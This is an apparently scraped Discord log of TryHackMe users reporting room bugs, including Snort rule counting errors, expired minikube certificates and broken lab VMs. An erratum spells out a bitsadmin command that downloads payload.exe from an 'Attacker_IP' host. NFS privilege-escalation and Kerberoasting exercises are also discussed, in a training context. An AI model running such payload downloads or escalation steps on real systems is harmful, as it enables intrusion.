so that section's answers are incorrectly input using the 328 rule hit log file

because you can't solve it with only inbound connections

I don't know how I can make it any more clear. If you get 328, your rules are wrong. The accepted answer on THM is correct. I've explained above why that is.

I even shared correct rules on the screenshot that give the correct and accepted answer.

Shall we get on a call and I'll show you what I mean?

I'll reset my progress and let's try it

No I'm not interested in having a call.

The room's questions are modeled after the 328 rule hit log file. so I assume all the question packet # need to be changed/halved because otherwise it doesn't give you the right answer

@polar rivet After digging into this I conclude you are absolutely right. Apologies for dismissing your concerns too quickly, I was too focused on the same mistake that I see people make every couple of days. Task 2 is wrong.

I have deleted some of these screenshots as they are answers not directly related to the report 🙂

@mild sequoia is this your room? if so would you be able to veirfy the above?

Took me a couple of hours to figure it out and verify but I'm 99% certain now what happened.

What regularly causes confusion with this task is that depending on how exactly you use Snort, you get different answers, even with the same rules. For example if you don't want to use a temporary log file so you directly run
sudo snort -c local.rules -r mx-3.pcap -A cmg -n 65
and look at the last line of the output for your answer, you get wrong results. Reason: Snort first reads 65 rows of unfiltered data from the pcap, then applies the rules in local.rules. If you happen to have packets that are not 80/TCP in those first 65 rows, which is the case with mx-3.pcap, the last line of the output is not the 65th 80/TCP segment, as intended. It's shifted by the number of non-80/TCP (with our file it's DNS) segments in the file before the 65th row.

You can get around that by using a BPF filter in addition to the rule
sudo snort -c local.rules -r mx-3.pcap -A cmg -n 65 'tcp and port 80
The BPF filter gets applied first, before Snort even sees data. Then 65 segments are cut off, then the rules are applied (without effect). No shift here.

Only if you use the correct rule AND BPF you get the correct values as they are in the pcap.

The behavior is different if you first log to a temporary file and then run Snort on that again:
sudo snort -c local.rules -r mx-3.pcap -A full -l .
sudo snort -r snort.log.1716517618 -A cmg -n 65

There is no shift in this case. These differences drove me nuts for a while, until I entangled them comparing outputs of different combinations...

What happened with the room is that originally the wrong Snort rules were used for question one, resulting in the wrong answer 328 being accepted. Those rules, which you find in many online walkthroughs and videos, mistakenly use two rules (as per question hint: Writing two simple rules will help you.) with the bidirectional flow operator <> each. Hence they count everything twice. See my screenshot from earlier. Instead they should use the unidirectional operator -> each. Ironically I've seen video walkthroughs where people understood 164 is correct and struggled with it not being accepted. Lots of comments suggesting to just double the figure without explaining why.

The room author must have noticed the mistake at some point and corrected it. But only question one, seemingly without taking into account that the new snort rules change all remaining answers in the task.

The combination of currently accepted answers for questions 2-7 can result from only one combination of actions: Using the wrong rules with <>, a temporary log-file and no BPF.

One gets the correct, but currently not accepted, answers by using the correct rules (with ->) either without temporary file but BPF filter or with temporary file. Or manually with Wireshark. All three align. Those values would be

2. 216.239.59.99
3. 0x2E6B5384
4. 0x36C21E28
5. 128
6. 145.254.160.237
7. 3372

Stumbled onto this bug.

Room: Credentials Harvesting
Task: 9

Question: After finding the SPN account from the previous question, perform the Kerberoasting attack to grab the TGS ticket and crack it. What is the password?
If you type in the cracked password without the last alpha-numerical it'll give you credit and fill it in for you.

Errata:

Room: Living Off the Land

Task: 4

Section: BITSAdmin

Command Prompt

Original Text:

bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe

Corrected Text:

bitsadmin.exe /transfer myJobName /Download /priority Foreground http://Attacker_IP/payload.exe C:\Users\thm\payload.exe

Notes: Original command responds with Error: "Invalid Argument"

Regarding Snort Challenge - The Basics: In Task 3 not even the first question has been corrected, where the same mistake was made as in Task 2. Counting packets twice because of <> in the rules where it should be ->. The provided ftp-png-gif.pcap file contains a total of 421 packets of any kind. The accepted answer to the question
Write rules to detect "all TCP port 21" traffic in the given pcap. What is the number of detected packets?

is larger than 421, which is not possible. It's also twice the actual correct answer.

It's not a bug, it's answer tolerance.

Just a context change... https://tryhackme.com/r/room/contentdiscovery (click the Blue button msg)

Yo https://tryhackme.com/r/room/kalkivaishakha ; this room got bug

the machine is up , but no any ports are shown open ??

This is a private room, and we can't help with this, 🙂

room type : Free room ?

Room Type

Free Room. Anyone can deploy virtual machines in the room (without being subscribed)!

Are you part of a school or business account?

none ,

I got the link to the room ,

Where did you get it from?

This is what I see when I try to access it 🙂 (for context)

oh , what does private room means ?? :

It means it's a room that has been created and not avaliable yet to members.

When a member creates a room, they need to push it to QA for testing before released to members.

do i need business email to access the ports ?

No, I can't say what you need as I can't see the room/machine or anything,

Thus can't provide help with.

thanks for the time

https://tryhackme.com/r/room/johntheripper0 Task 10. This must be inside the rar file. Zip was the previous task.

In the same room task 11 this text
Using John to crack the SSH private key password of id_rsa files. Unless configured otherwise, you authenticate your SSH login using a password. However, you can configure key-based authentication, which lets you use your private key, id_rsa, as an authentication key to login to a remote machine over SSH.
implies that the private key must be/is always called id_rsa, when that's merely a default file name when specifying a specific cryptographic algorithm. That's something obvious for those who know but potentially confuses THM's target group, learners who might have seen id_ed25519 or mykey somewhere else. There's not even a need to use a specific file name in this explanatory text. Better:
Using John to crack the password of SSH private key files. Unless configured otherwise, you authenticate your SSH login using a password. However, you can configure key-based authentication, which lets you use your private key as an authentication key to login to a remote machine over SSH.

As the name suggests ssh2john converts the id_rsa private key that you use to login to the SSH session into hash format that john can work with. => As the name suggests ssh2john converts the private key that you use to login to the SSH session into hash format that john can work with.

Certificate expired again... please help 🙏

We’re aware of this and is in the process of being fixed

I've just fixed it on a copy. Pushing to the site shortly. There'll be an updated command for launching velociraptor in the room when it's ready

it is fixed:) @bronze mortar @topaz thorn

In linux fundamentals part 2, premissions 101. The text hasn't been updated meanwhile the examples have been changed, so it talks about non-existent things which confuses people. Those screenshots it talks about are only in the video walkthrough. The dated text under those updated examples becomes jargon.

@clever tangle

You need to verify to attach screenshots

Oki!

Gave 1 Rep to cmnatic (current: #7 - 841)

Hello, Bug in Room Virtualization and Containers Task 6. Question How many pods are running on the provided cluster
The command kubectl get pods dont work.

Error Message after minikube start

X Exiting due to GUEST_START: failed to start node: wait: /bin/bash -c "sudo env PATH="/var/lib/minikube/binaries/v1.26.3:$PATH" kubeadm init -
-config /var/tmp/minikube/kubeadm.yaml --ignore-preflight-errors=DirAvailable--etc-kubernetes-manifests,DirAvailable--var-lib-minikube,DirAvai
lable--var-lib-minikube-etcd,FileAvailable--etc-kubernetes-manifests-kube-scheduler.yaml,FileAvailable--etc-kubernetes-manifests-kube-apiserver
.yaml,FileAvailable--etc-kubernetes-manifests-kube-controller-manager.yaml,FileAvailable--etc-kubernetes-manifests-etcd.yaml,Port-10250,Swap,Nu
mCPU,Mem,SystemVerification,FileContent--proc-sys-net-bridge-bridge-nf-call-iptables": Process exited with status 1
stdout:
[init] Using Kubernetes version: v1.26.3
[preflight] Running pre-flight checks
[preflight] The system verification failed. Printing the output from the verification:
KERNEL_VERSION: 5.4.0-1029-aws
OS: Linux
CGROUPS_CPU: enabled
CGROUPS_CPUACCT: enabled
CGROUPS_CPUSET: enabled
CGROUPS_DEVICES: enabled
CGROUPS_FREEZER: enabled
CGROUPS_MEMORY: enabled
CGROUPS_PIDS: enabled
CGROUPS_HUGETLB: enabled
CGROUPS_BLKIO: enabled

[preflight] Pulling images required for setting up a Kubernetes cluster
[preflight] This might take a minute or two, depending on the speed of your internet connection
[preflight] You can also perform this action in beforehand using 'kubeadm config images pull'
[certs] Using certificateDir folder "/var/lib/minikube/certs"
[certs] Using existing ca certificate authority
[certs] Using existing apiserver certificate and key on disk
stderr:
W0527 09:32:14.378602 8657 initconfiguration.go:119] Usage of CRI endpoints without URL scheme is deprecated and can cause kubelet errors in
the future. Automatically prepending scheme "unix" to the "criSocket" with value "/var/run/cri-dockerd.sock". Please update your configuration
!
[WARNING SystemVerification]: failed to parse kernel config: unable to load kernel module: "configs", output: "modprobe: FATAL: Module
configs not found in directory /lib/modules/5.4.0-1029-aws\n", err: exit status 1
[WARNING Service-Kubelet]: kubelet service is not enabled, please run 'systemctl enable kubelet.service'
W0527 09:32:14.781374 8657 certs.go:521] WARNING: could not validate bounds for certificate apiserver-kubelet-client: the certificate has ex
pired: NotBefore: 2023-05-10 19:06:15 +0000 UTC, NotAfter: 2024-05-10 19:06:18 +0000 UTC
error execution phase certs/apiserver-kubelet-client: [certs] certificate apiserver-kubelet-client not signed by CA certificate ca: x509: certi
ficate has expired or is not yet valid: current time 2024-05-27T09:32:14Z is after 2024-05-10T19:06:18Z
To see the stack trace of this error execute with --v=5 or higher

╭─────────────────────────────────────────────────────────────────────────────────────────────╮

│ │
│ * If the above advice does not help, please let us know: │
│ https://github.com/kubernetes/minikube/issues/new/choose │
│ │
│ * Please run minikube logs --file=logs.txt and attach logs.txt to the GitHub issue. │
│ │
╰─────────────────────────────────────────────────────────────────────────────────────────────╯

Error Message after kubectl get pods

E0527 09:13:02.813570 5840 memcache.go:265] couldn't get current server API group list: Get "https://192.168.49.2:8443/api?timeout=32s": dia
l tcp 192.168.49.2:8443: connect: connection refused
E0527 09:13:02.814352 5840 memcache.go:265] couldn't get current server API group list: Get "https://192.168.49.2:8443/api?timeout=32s": dia
l tcp 192.168.49.2:8443: connect: connection refused
E0527 09:13:02.816022 5840 memcache.go:265] couldn't get current server API group list: Get "https://192.168.49.2:8443/api?timeout=32s": dia
l tcp 192.168.49.2:8443: connect: connection refused
E0527 09:13:02.817801 5840 memcache.go:265] couldn't get current server API group list: Get "https://192.168.49.2:8443/api?timeout=32s": dia
l tcp 192.168.49.2:8443: connect: connection refused
E0527 09:13:02.819454 5840 memcache.go:265] couldn't get current server API group list: Get "https://192.168.49.2:8443/api?timeout=32s": dia
l tcp 192.168.49.2:8443: connect: connection refused
The connection to the server 192.168.49.2:8443 was refused - did you specify the right host or port?

Confirming what @karmic jackal wrote: Room Virtualization and Containers (https://tryhackme.com/r/room/virtualizationandcontainers), Task 6, the attached VM is broken.
Expected behavior: Minikube spins up Kubernetes with minikube start.
Observed behavior: Minikube fails with error messages and kubectl subsequently fails to connect to the kube-api server, since that never starts.
Killing and restarting the target does not help.

Looks like a certificate expired on May 10th.

We're aware and is being fixed 🙂

Is the Snort Challenge 1 room also getting fixed eventually, after 25 months of confusing users with wrong and contradicting accepted answers? Considering people pay to access it, I believe there's a reasonable expectation to see this updated, once known to THM. Which has been the case for many months as well.

I'm not sure about that one, as there is two solution when we asked the creator

~~1st solution:
alert tcp any 80 <> any any (msg:"TCP port 80 traffic detected";sid:1000000000001; rev :1)
OR
alert tcp any any <> any 80 (msg:"TCP port 80 traffic detected";sid:1000000000001; rev :1)

2nd solution:
Both of these must be used.
alert tcp any any -> any 80 (msg:"Detecting Inbound TCP Port 80 Traffic"; sid:1000000000001;)
alert tcp any 80 -> any any (msg:"Detecting Outbound TCP Port 80 Traffic"; sid:1000000000002;)~~

I have explained the problem at length, but here's one more try:

In Task 2, question 1, originally a wrong answer was accepted which counted each packet twice, resulting in a number 2x too high. That was corrected, but the accepted answers to the following questions were never adapted to that.
With your 2nd solution you DO get the correct answer to question 1 but NOT for question 2-7.

Then in task 3 (same idea for FTP), nothing was ever updated. The accepted answer is 2x too high. In fact the accepted answer for "how many tcp/21 packets are there" is HIGHER than the total number of packets in the pcap file, which is obviously wrong.

There's not really room for interpretation here. It's blatantly wrong.

"I have explained the problem at length, but here's one more try:"

Please be civil to support, they're not on Discord to be spoken to this way.

The creator has provided an adequate solution.

The creator has not provided an adequate solution. The accepted answers to the room are wrong.

In the .pcap file for task 3 there's a total of 421 packets. The accepted answer to Write rules to detect "all TCP port 21" traffic in the given pcap. What is the number of detected packets? is significantly higher than 421.
I do not need to explain how that is wrong.

The creator has updated question 1 in task 2 and kept the rest as it always was. I have explained in detail why that is wrong. As have others before me.
If it is in fact THM's policy to ignore it when paying users are doing quality control for them and to willingly leave wrong content online, causing paying subsribers to waste time, I can't but take my money elsewhere. Not because the couple of bucks hurt me but out of principle.

Which results in the "funny" (for those who don't struggle with it because they're unaware) situation that the rules provided by the creator above:

Both of these must be used. alert tcp any any -> any 80 (msg:"Detecting Inbound TCP Port 80 Traffic"; sid:1000000000001;) alert tcp any 80 -> any any (msg:"Detecting Outbound TCP Port 80 Traffic"; sid:1000000000002;)

do give the correct answer for Task 2 Question 1 but - after replacing 80 by 21 - do give a wrong (as in: not accepted by THM) answer (factor 2 too high) for Task 3 Question 1. For the above-mentioned reasons.
It is impossible to complete the room doing the objectively correct thing, even as advised by the creator themselves.

Rules as provided by room creator.

Output from sudo snort -c local.rules -r ftp-png-gif.pcap

Accepted answer in room: Not 307.

Total number of packets in ftp-png-gif.pcap: 421 as per Wireshark.
Accepted answer in room: >421, by more than a hundred, without spoiling the precise answer.

I am very curious what you think is an "adequate solution" to this @quaint sparrow , in particular how the rules provided by the creator, which I have used, present one.

@quaint sparrow Given the lack of an answer, I conclude you also don't know how ||6xx|| tcp/21 packets (the wrong but accepted answer) fit into a 421 packet pcap file and how the snort rules provided by the room creator here, which give the accepted and correct answer for task 2 question 1 but do not give the accepted answer for other questions in the same room are an "adequate solution" to the issue at hand.
Given how much you like to point out LLMs being "confidently wrong", I find this ironic and suggest next time you look into a matter before making premature statements that imply another member of this server being mistaken.

It's flattering that you pinged in a completly different channel to the one aren't speaking in.

I've not even done the room, staff have spoken to the creator and the creator gave an explanation on how it's solved.

My view on LLM's has nothing at all with conversation, as for looking in to the matter, I don't have to. Staff have already done it, as explained above. 🙂

I have explained to you in detail that the creator's explanation does not in fact sovle the room. I am pinging you in the room in which you had yesterday made the same claim, to which I have asked you how >421 tcp/21 packets fit into a 421 packet pcap file. You have ignored that question, because you know the answer is that that's impossible and therefore the accepted answer in the room is wrong.

What I do not understand is why it's this room in particular where staff reacts by not reacting and mods react with snarky comments. Whereas other bugs are in fact fixed. What's special about it?

because you know the answer is that that's impossible and therefore the accepted answer in the room is wrong.

Please don't speak for me. 🙂

If you have an issue with this, please use #feedback-and-ideas

If in fact you do not understand how >421 tcp/21 packets can't fit into a pcap file with 421 packets total, you lack the knowledge required to assess whether the snort rules shared by staff are an "adequate solution". In this unlikely case you should have not made that remark.

Okay, can we keep it civil please 🙂

If bugs are not being reported, then the discussion can stop here

The bug has been reported and explained in detail from multiple angles. I would like to know if that is being acknowledged by staff responsible for that room and eventually being fixed, or if staff will continue to ignore it. That would not be something I'd like to support with my money.

I have acknowledged it, yes 🙂
Thank you for reporting it, I appreciate the length that you have gone to.

We have investigated this room multiple times in the past, and had our content engineers try the room, we did not find any problems with it.

I will confer with a member of our team and see if we can investigate it again, and clear up any problems 🙂

Appreciated.

room/signatureevasion

Needs to be rounded

6.3539.. rounded to 3 decimal places

i got it

😄

but that's worded weirdly

It is worded as expected 😁

I've been an english speaker my whole life. That means what are the first 3 decimals

Key word here is "rounding"

It's not asking you just for the first three figures, it is asking you to round it.
This means that you will need to either increase the third number up by 1 if the number after it is 5-9, or keep it the same if it is 0-4

https://www.bbc.co.uk/bitesize/guides/zscq6yc/revision/2

I hope that makes sense 🙂

The detection count (alerts) can be bigger than the total number of packets. 🙂

Even if we assumed that made sense (looking at the question wording it does not): There's still the fact that task 2 question 1 was updated (halving the initially accepted answer by correctly using -> instead of <> in the two snort rules) but those same corrected snort rules do not give the accepted answer for other questions both in the same task and the room. Including task 3 question 1, where you have to use the old, wrong rules with <> (counting everything twice, which makes no sense whatsoever) to get to the accepted answer.
A user who figures out the correct(ed) rules that have been shared earlier here by staff as well as by me has to make use of walkthroughs to solve the rest of the room.

I have a hard time believing that is the intended experience.

It depends on how one writes their rules. This is a challenge, so it all depends on that.

As I said: Using the correct rules provided by the room creator, shared by staff earlier in this channel.

I just completed Task 2 and 3 without a problem, but of course it depends how I wrote the rules. Regardless what the intended way of solving it is.

I don't know how else to phrase it: If you use the snort rules from the room creator themselves, that give the correct answer for task 2, you do not get all correct answers. Since the remaining answers in task 2 are based on the snort rules from question 1, that can't be correct.

Have you completed the room?

Of course it depends how I wrote those rules. That's a given. If you use the correct rules as provided by the room creator for task 2 question 1 and other, incorrect rules for remaining questions and task 3 question 1, you can solve it.

I've spent an ungodly amount of time trying out various rules and comparing the results with the accepted answers. So I can make it more concrete: Using the objectively correct rules provided by the room creator, one gets the following answers for task 2:

Which rule did you use?

||
2) 216.239.59.99
3) 0x2E6B5384
4) 0x36C21E28
5) 128
6) 145.254.160.237
7) 3372
|||
Of those, 3 are accepted answers, 3 are not.

If one uses the wrong rules with <> instead, that were initially used by the room creator before corrections, one gets the following answers:
||
2) 145.254.160.237
3) 0x38AFFFF3
4) 0x38AFFFF3
5) 128
6) 145.254.160.237
7) 3372
||
Of those, all are accepted answers. Except that if you use those wrong rules to get Q2-7 right, you get the wrong answer for question 1

The two rules the creator shared with staff. Which must be the assumption anyways, since the question hint tells the user to write two rules.

And since I really wanted to know what's in the file and exclude potential wrong use of snort on my side, I loaded the .pcap in Wireshark, applied the same filter for tcp/80 and solved task 2 that way. Turns out with Wireshark you get the exact same answers as you get with the objectively correct two snort rules that have been shared here by the room creator, namely
||
2) 216.239.59.99
3) 0x2E6B5384
4) 0x36C21E28
5) 128
6) 145.254.160.237
7) 3372
||
Problem being again: Those are not the accepted THM answers. To get those, you need to use wrong rules. Wrong rules that give a number twice too high for Q1 (beacuse they count everything double). One only gets the accepted (and correct) answer for Q1 using the correct rules as shared by the room creator. I know it's repetitive, I just don't know how else to make it clear.

is there a place to make ticket if the room is buged?

Hey there 👋

You are still around?

Here

May I DM you?

I have reviewed this issue and made changes to Task 2, but I wanted to quickly ask you a few things

Assuming nothing got cached and I'm seeing the most recent version after changes, after reseting my room progress: I can confirm that for Snort Challenge - The Basics: Task 2 each of the following three (sets of) snort rule(s) gives identical answers for all questions of task 2, and they are all the accepted answers, and they are all the correct answers one finds manually inspecting the .pcap in Wireshark (unlike before):

||alert tcp any 80 <> any any (msg:"TCP port 80 traffic detected";sid:1000000000001; rev :1)||
OR
||alert tcp any any <> any 80 (msg:"TCP port 80 traffic detected";sid:1000000000001; rev :1)||
OR both of these
||alert tcp any any -> any 80 (msg:"Detecting Inbound TCP Port 80 Traffic"; sid:1000000000001;)
alert tcp any 80 -> any any (msg:"Detecting Outbound TCP Port 80 Traffic"; sid:1000000000002;)||

That means
a) task 2 works perfectly now with each (set of) rule(s) consistently providing the accepted and correct answers for all questions in the task, unlike before.
b) The new question 1 hint Make sure to only use a single rule is not even required. It also works with two rules, as long as they don't contain the <> operator.

As I was told Task 3 is undergoing the same changes, so that's going to be fixed soon as well. Thank you @raw bison again for looking into this! I would like to write a walk-through once all changes are made, because all existing ones out there are wrong. Is my understanding correct that that's okay even for subscription rooms, provided I redact the flags/answers?

Gave +1 Rep to @raw bison (current: #3 - 1825)

@full crag A write-up would be awesome. 👍

Hey there!

Thanks for checking and the feedback again 🙂

I on purpose changed the narrative to single rule to counter the following 2 cases:

Using the 2 previous rules:

||alert tcp any 80 <> any any (msg:"TCP port 80 traffic detected";sid:1000000000001; rev:1;)||
||alert tcp any any <> any 80 (msg:"TCP port 80 traffic detected";sid:1000000000002; rev:1;)||

Using 2 single rules where one accidently uses the same sid for both:

||alert tcp any any -> any 80 (msg:"TCP port 80 inbound traffic detected";sid:1000000000001; rev:1;)||
||alert tcp any 80 -> any any (msg:"TCP port 80 outbound traffic detected";sid:1000000000001; rev:1;)||

Gave +1 Rep to @full crag (current: #217 - 25)

Alright, have also updated the task text, Task 3 question 1, Task 3 question 1 hint, as well as added a hint for task 3 question 2 (I felt like this might be helpful for some, but let me know if you might think that's "too much")? 🙂

All good now where changes were made. The only thing I'm note sure about is task 3 question 5. The hint says

Each FTP login attempt with a valid username and bad password prompts a default message with the pattern; "331 Password". Try to filter the given pattern in the FTP traffic. Try to filter the given username.

But a username is neither required to get the accepted answer nor is a username given until the following question 6. That might cause confusion and lost time when users try to figure out where they might have missed a username. And then when I looked into it a bit to learn myself, I noticed the question might not line up with the accepted answer at all. You get the accepted answer with this rule:

alert tcp any 21 <> any any (msg:"TCP port 21 traffic detected";content:"331 Password";sid:1000000000001; rev :1)

FTP status 331 stands for "User name okay, need password". It is sent when a username has been provided but no password (yet). It is not sent when a username has been provided but a wrong/bad password. In the latter case vsftpd (and all docs I could find) replies with 530:

But if you do filter the .pcap provided in the room for both 331 and 530 in order to satisfy the wording of the question:

Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.

with rules like this

`# No password
alert tcp any 21 <> any any (msg:"TCP port 21 traffic detected";content:"331 Password";sid:1000000000001; rev :1)

Bad password

alert tcp any 21 <> any any (msg:"TCP port 21 traffic detected";content:"530";sid:1000000000002; rev :1)`

you get a count of 83, which is not the accepted answer.

I again looked at the .pcap file manually in wireshark and got the same result. Filtering for
ftp.response.code==331 gives the answer accepted as correct in the room, but doesn't satisfy the wording of the question.

Filtering for
ftp.response.code==331 or ftp.response.code==530 gives again 83 which does satisfy the question but is not the accepted answer in the room.

The same results that you get with snort:

Hence if I haven't made a mistake somewhere the question should instead of
Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.
ask:
Write a rule to detect failed FTP login attempts with a valid username but no password.
and the hint accordingly. Or the question stays but the accepted answers is changed, but I believe the room creator intended the former, where you only filter for 331.

I think you a right in terms of improving this question a little bit.

But after looking at it, I don't think it should be either one of these sentences, and instead:

Write a rule to detect FTP login attempts with a valid username but no password entered yet.

What you think?

I 100% agree, that's exactly what the status code stands for which you have to filter for to get the accepted answer.

Updated the text and the hint, let me know in case there needs to be still some change done.

Thanks again 🙂

Gave +1 Rep to @full crag (current: #210 - 26)

Edit: Also adapted Question 6 in that regards

Quicker than me. Was just gonna write 👍

Thanks!

Gave +1 Rep to @raw bison (current: #3 - 1826)

Hey,

regarding room Pyramid Of Pain > Domain Names (Simple) > Go to this report on app.any.run and provide the first suspicious URL request you are seeing, you will be using this report to answer the remaining questions of this task.

This is asking for an URL (HTTP) Request. The HTTP Request tab in any.run are all empty. And I think what is being asked here is a DNS Query to a domain instead of an URL Request. The accepted answer is "craftingalegacy.com" - which is a domain name and not an URL, right? 😮

I didn't notice when I did the room myself, but I think you're right. A URL is defined as having a non-empty scheme (http|https|ftp). There are no schemes involved in DNS requests, which is where the accepted answers is found. A FQDN is not an URL.

I'll raise it

I have raised it

this syntax is not working anymore in wireshark packet operations room

this is working

btw i used my own wireshark not the tryhackme vm

so its bec of version diff ig

Yep, 2021 version of docs has the syntax without comma

https://web.archive.org/web/20210308140725/https://www.wireshark.org/docs/wsug_html_chunked/ChWorkBuildDisplayFilterSection.html

I've posted this in another channel

The split screen machine uses Wireshark 3.2.3, so the commas are non essential.

Although newer Wireshark removes the commas, the Wireshark in the machine you're supposed to be using doesn't need commas.

so I have an older version wireshark?

I'm using kali linux

i updated all but still it's older version

Go to Help > about wireshark

It says 4.2.2 mine is updated

THM vm has an older version wireshark

Yes, that's my point.

The older version that is on the machine doesn't need commas for it to work.

So in that sense, the task material is correct.

Good morning, can someone please help me with task 9 of the pyramid of pain, I'm stuck and the headings of the questions are very limited, it's not like the old version.

?

Except for one term, which you can google, all of the statements can be found almost verbatim in the room text. I don't think anything is bugged with it.

This isn't a bug, please use #room-help

https://tryhackme.com/r/room/linuxprocessanalysis on task 4, it requires you to use pspy64 and i've been waiting for quite awhile and it seems to simply lag out. maybe i'm just not waiting long enough, but i feel like 10 minutes should be long enough. i've tried it through the browser and using ssh with my personal computer and run into the same issue.

just sits there and hangs

maybe it's because i didn't export the environment variables when i restarted this thing like 500 times. let me try that.

honestly idk if putting in the correct environment variables did anything. i DO know that it took about 30 minutes to start printing process information.

but it did eventually work

Room Warzone 1 question 4 is missing and i almost went mad searching for an answer when there is no question

@quaint sparrow

That's question 4.

Nope

It's threat group code name bruh

Look at right side

Do a search on the [domain] of the IP.

But still it's missing right side question is old one

6th question still refers to the missing question

Don't go by writeups published on medium.

If that's how you're answering tasks you're only cheating yourself.

I searched for 20mins before going to that website

Then there isn't much I can do, staff will see it when they see it and decide if it needs fixed or not.

There is no domain from question 4

In this case writeups help figuring out the problem here. As of October 2022 question 4 was
Inspect the IP address in VirsusTotal. Under Relations > Passive DNS Replication, which domain has the most detections? Enter your answer in a defanged format.
Now it is
Still in VirusTotal, under Community, what threat group is attributed to this IP address?

so the reference

Do a search in VirusTotal for the domain from question 4

is already broken. But even if you use the IP address (accepted answer question 3) and look what domains are are attributed to it on virustotal, you're not getting the accepted answer for Q6.

There about a dozen domains attributed to it, among them one that's NSFW. There is no way to know that it's ||fidufagios.com|| you need to search for in order to get the accepted answer. At least one other domain in the list has a higher detection count but leads to nowhere.

This is likely another case of one question having been changed without adapting the rest of the room to it.

This is the list of domains one would have to all manually check, if not going for the one with most detections. Which does not lead to the accepted answer.

That's why I checked for answer in medium website also it's not showing any answers only methods

@full crag now I get why they removed the question 4 because most detected domain changes over time and it changed so even if you try to search answer for removed 4 question you don't get the answer because most detected domain changes over time

But they didn't check for questions related to the 4th question

TryHackMe Linux Privilege Escalation Module: NFS Task Issue Report (TASK11) https://tryhackme.com/r/room/linprivesc

Hey everyone,
I'm working through the Linux Privilege Escalation module in the Jr. Pentester path on TryHackMe, and I've hit a snag with the NFS Task. I'm pretty sure I've followed all the steps correctly, but I keep getting an error about a missing library on the remote host (RHOST).

My Setup

Here's a quick rundown of my subterminals on my screenshots:

1. RHOST: The remote host I'm trying to escalate privileges on.
2. root LHOST: My local host with root privileges for the privilege escalation attempts.
3. LHOST: My local host used to enumerate NFS services on the RHOST.

Mounts
mount RHOST: /tmp (every file shared with LHOST)
mount LHOST: /tmp/mnt (every file shared with RHOST)

What I've Tried

0. Approach gcc -o nfs.c nfs -w didn´t work. (see picture)
1. Using gcc with -static: This worked perfectly!
2. Copying /bin/bash to bash, then using chown and chmod: Didn't work. I faced the same issue with the compiled executable, as described in the task.
3. Another method: Creating a vm to with the task kernel to have a wayback library. Didn't try this one. 😄

Thoughts and Potential Issues

Since the original methods are failing, I'm thinking this might be an issue with the older versions being used in the module. This could cause problems, especially for beginners who most likely encounter this task in their early learning phase, and not having many troubleshooting skills.

Request for Help

• Is it possible to add the command switch -static to the gcc compile onliner?

Additional Attempts

I even tried copying the RHOST bash executable to the LHOST and renamed it to bash_root to ensure full root ownership. However, I still can't escalate my privileges with this approach.

gcc nfs.c -o nfs -w -static

cp /bin/bash /tmp/mnt/bash
(on LHOST)

gcc nfs.c -o nfs -w

I am having the same issue
Its a issue with the VM inside the room, I believe they need to upgrade the vm or something so when we compile on our attack system it works on victim machine

#878393611929129000 message

Hello there o/

I have a little submission flag with the room velociraptor of the path sol_lvl1
I have the flag for the task 7 and parse mft args but it is not flagging someone for help?

I did 3 last night, it was more effort I guess but I learned more and thats what matters

This isn't a bug, can you double check it's correct, I just done it.

Can i dm you for more explanations?

Sure

done and thx

Gave +1 Rep to @quaint sparrow (current: #1 - 2351)

https://tryhackme.com/r/room/snort task 5. The command sudo snort -v-i eth0 should be sudo snort -v -i eth0

Has been reported at least 2 times previously, one of them months ago. Edit: >1 year ago in fact: #room-bugs message

Good reminder for THM staff then ;)

Fixed, thx 👍

Gave +1 Rep to @crystal marten (current: #161 - 41)

I found a room bug, in the room Mal:REMnux from cmnatic the tool extractor is not installed on the server and therefore task 3 cannot be solved at all

I have already restarted the server but it still didn't work so I think it's a bug

hello can you tell me if you're doing the first room (https://tryhackme.com/r/room/malremnux) or the second (https://tryhackme.com/r/room/malremnuxv2)

It is the second

@dusky junco

Just tested on both examples in task 3 and it worked fine for me. Maybe double check the syntax

I tested it twice, I even restarted the machine and it didn't work

.

The room creator has replied, they'll check it out.

I'll find a time today to have a check and let you know

Ok

Thx

room/mitre has a issue. It links to a page that no longer has unit tests on the page. So you cant awnser the question.

Task and Question?

oh wait. everything is a hyperlink execept the page you need to look at. Common teachers practisch if you ask me.

Hello on https://tryhackme.com/r/room/adventofcyber2023 TASK [Day 2], it's written Pandas is a Python library that allows us to manipulate, process, and structure data. It can be imported using import pandas. In today’s task, we are going to import Pandas as the alias "pd" to make it easier to refer to within our program. This can be done via import as pd.
Should be "import pandas as pd"

Is there any ETA to this being fixed, trying to complete room today and running into this error still

stderr:
W0609 09:51:19.652945 3674 initconfiguration.go:119] Usage of CRI endpoints without URL sc
heme is deprecated and can cause kubelet errors in the future. Automatically prepending schem
e "unix" to the "criSocket" with value "/var/run/cri-dockerd.sock". Please update your config
uration!
[WARNING SystemVerification]: failed to parse kernel config: unable to load kernel mo
dule: "configs", output: "modprobe: FATAL: Module configs not found in directory /lib/modules
/5.4.0-1029-aws\n", err: exit status 1
[WARNING Service-Kubelet]: kubelet service is not enabled, please run 'systemctl enab
le kubelet.service'
W0609 09:51:19.983861 3674 certs.go:521] WARNING: could not validate bounds for certificat
e apiserver-kubelet-client: the certificate has expired: NotBefore: 2023-05-10 19:06:15 +0000
UTC, NotAfter: 2024-05-10 19:06:18 +0000 UTC
error execution phase certs/apiserver-kubelet-client: [certs] certificate apiserver-kubelet-c
lient not signed by CA certificate ca: x509: certificate has expired or is not yet valid: cur
rent time 2024-06-09T09:51:19Z is after 2024-05-10T19:06:18Z
To see the stack trace of this error execute with --v=5 or higher

Very frustrating

I'll ask for an update on this room

It's been a while since I've dealt with certificates in kubernetes and I've always hated it, but if it's signed by a local CA there should be an easy workaround. One command. I'm gonna look into it later...

I must admit defeat. I'm able to renew the certificates manually but then the deployments are gone. The fact that it's not just K8S but minikube on top adds another layer of complexity. The issue has been reported outside of THM but the only fixes I've found come with losing all existing deployments.

Hello, apologies for this. And thanks for taking a look @full crag.

I am working on a fix for this which should be live in the next couple of days, and we have a longer-term solution for the issues regarding certificates with minikube & k8s

Gave +1 Rep to @hexed plaza (current: #2092 - 1)

Part 2 (the splunk part) of TryHack3M: Subscribe (https://tryhackme.com/r/room/subscribe) seems impossible - splunk on the machine says the license is expired and refuses to allow even a basic search. It prompts to install a license, and an enterprise trial license is possible, but it appears I would have to find and dl one, which I'm not really interesting in doing... if it's even possible for an individual

I tried switching to free version just to see if it would work enough for the lab, but it won't actually let me switch 🤷‍♂️

